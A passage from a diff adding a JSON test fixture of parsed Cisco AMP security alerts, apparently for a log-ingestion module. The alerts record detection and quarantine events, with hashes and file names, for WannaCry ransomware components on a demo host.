"10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558987", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + 
"log.offset": 27172, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558986", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 28358, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558985", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 29544, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558984", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" 
+ ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 30737, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.2CA2D550E6-100.SBX.VIOC", + "cisco.amp.detection_id": "6419303574240493599", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 461000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "file.name": "taskse.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe", + "fileset.name": 
"amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 31923, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.4A468603FD.04426d77.auto.Talos", + "cisco.amp.detection_id": "6419303574240493597", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 430000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "file.name": "taskdl.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": 
"Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 33372, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419303574240493595", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 327000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": 
"Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 34828, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419303574240493594", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 313000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": 
"@WanaDecryptor@.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 36357, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303574240493595", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": 
"Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 37912, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303574240493594", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 39032, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + 
"ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526290", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 40152, + "related.hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303569945526289", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": 
"cisco", + "event.severity": 2, + "file.hash.sha256": "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 41272, + "related.hash": [ + "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:11.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558983", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 664000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303574240494000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 42392, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": 
"2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558982", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 782000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 43512, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558980", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + 
"cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 44698, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558979", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": 
"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 45884, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419303565650558978", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 751000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 47070, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + 
}, + { + "@timestamp": "2021-01-14T19:29:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.2CA2D550E6-100.SBX.VIOC", + "cisco.amp.detection_id": "6419303569945526290", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 580000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419303569945526000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "8495400f199ac77853c53b5a3f278f3e", + "file.hash.sha1": "be5d6279874da315e3080b06083757aad9b32c23", + "file.hash.sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "file.name": "taskse.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 48256, + "process.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "process.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2920, + "related.hash": [ + "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d", + "8495400f199ac77853c53b5a3f278f3e", + 
